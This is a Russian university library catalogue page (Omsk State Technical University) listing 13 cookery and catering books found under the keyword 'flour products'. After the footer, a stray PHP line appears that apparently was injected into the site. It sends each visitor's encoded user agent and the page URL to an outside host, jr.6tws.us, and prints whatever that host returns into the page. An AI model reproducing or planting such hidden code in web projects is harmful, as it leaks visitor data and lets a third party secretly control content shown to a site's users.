Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

94 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИЗДЕЛИЯ МУЧНЫЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 13
1. 
Бурчакова И. Ю. Организация процесса приготовления и приготовление сложных хлебобулочных, мучных кондитерских изделий [Текст] / И. Ю. Бурчакова, С. В. Ермилова, 2014. - 384 с. : [8] вкл. цв. л. с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- МИНИ - ПЕКАРНЯ -- ОБОРУДОВАНИЕ МЕХАНИЧЕСКОЕ -- ОБОРУДОВАНИЕ СОРТИРОВОЧНО - КАЛИБРОВОЧНОЕ -- ОБОРУДОВАНИЕ МОЕЧНОЕ -- ОБОРУДОВАНИЕ МЕСИЛЬНО - ПЕРЕМЕШИВАЮЩЕЕ -- ОБОРУДОВАНИЕ ДОЗИРОВОЧНО - ФОРМОВОЧНОЕ -- ОБОРУДОВАНИЕ ИЗМЕЛЬЧИТЕЛЬНО-РЕЖУЩЕЕ -- ОБОРУДОВАНИЕ РАЗБРЫЗГИВАЮЩЕЕ -- ОБОРУДОВАНИЕ СПЕЦИАЛЬНОЕ -- ОБОРУДОВАНИЕ УПАКОВОЧНОЕ -- ОБОРУДОВАНИЕ ТЕПЛОВОЕ -- ОБОРУДОВАНИЕ ВАРОЧНОЕ -- ОБОРУДОВАНИЕ ДЛЯ РАССТОЙКИ ТЕСТОВЫХ ЗАГОТОВОК -- ОБОРУДОВАНИЕ ЖАРОЧНОЕ -- ПЛИТА -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ТРЕБОВАНИЯ САНИТАРНЫЕ -- КОНТРОЛЬ КАЧЕСТВА КОНДИТЕРСКИХ ИЗДЕЛИЙ -- СЫРЬЕ КОНДИТЕРСКОЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ СЫРЬЯ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- СИРОП -- ПОМАДА -- ЖЕЛЕ -- ГЛАЗУРЬ КОНДИТЕРСКАЯ -- КРЕМ -- МУСС -- КАРАМЕЛЬ -- МАРЦИПАН -- МАСТИКА САХАРНАЯ -- ПРАЛИНЕ -- ПОСЫПКА КОНДИТЕРСКАЯ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ СЛОЖНЫЕ -- ХЛЕБ ПРАЗДНИЧНЫЙ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ СЛОЖНЫЕ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ПРЯНИЧНЫЕ -- ТОРТЫ -- КАЧЕСТВО КОНДИТЕРСКИХ ИЗДЕЛИЙ -- ХРАНЕНИЕ КОНДИТЕРСКИХ ИЗДЕЛИЙ -- МЕРА - МАССА
Держатели документа (Информация об экземплярах) 
2. 
Фатов М. Ф. 1000 блюд ресторанной кухни [Текст] / М. Ф. Фатов, В. В. Холодков ; ред. Н. И. Ковалев, 1985. - 295 с.
Держатели документа (Информация об экземплярах) 
3. 
Козлова С. Н. Кулинарная характеристика блюд [Текст] / С. Н. Козлова, Е. Ю. Фединишина, 2014. - 191 с.
Ключевые слова 
ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКА -- ПОЛУФАБРИКАТЫ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- БЛЮДА ЛЕЧЕБНОГО ПИТАНИЯ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА НАЦИОНАЛЬНОЙ КУХНИ -- КУХНЯ НАЦИОНАЛЬНАЯ -- ПИТАНИЕ ИНТУРИСТОВ -- БЛЮДА ЗАРУБЕЖНОЙ КУХНИ -- КУХНЯ ЗАРУБЕЖНАЯ
Держатели документа (Информация об экземплярах) 
4. 
Иванова Т. Н. Товароведение и экспертиза пищевых концентратов и пищевых добавок [Текст] / Т. Н. Иванова, В. М. Позняковский, В. Ф. Добровольский, 2014. - 264 с.
Держатели документа (Информация об экземплярах) 
5. 
Новости торговли. - Журнал, 2007г. № 9
Оглавление 
  • Новый шоколад СладКо - стабильность высокого качества и постоянство вкуса. - с.9
    Кл. слова: ШОКОЛАД
  • Кузнецова, Н. Сладкие радости / Н. Кузнецова. - с.40-47
    Кл. слова: ИЗДЕЛИЯ МУЧНЫЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Миронова, В. Чаепитие в высокой динамике / В. Миронова. - с.48-54
    Кл. слова: ЧАЙ - ТОРГОВЛЯ
6. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] / сост. Л. Е. Голунова, 2001. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
7. 
Богушева В. И. Технология приготовления пищи [Текст] / В. И. Богушева, 2015. - 375 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
8. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2002. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
10. 
Уласевич М. В. Приготовление пищи. Спецтехнология [Текст] : учеб. пособие для уч-ся проф-технич. учеб. заведений / М. В. Уласевич, 2003. - 367 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
11. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2003. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
12. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] : нормативный документ / сост. Л. Е. Голунова, 2003. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
13. 
Технология приготовления блюд и кулинарных изделий [Текст] : справ. пособие для общественного питания / сост. Р. П. Антонова, 2002. - 199 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.83 с.14 запросов, 0.50c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;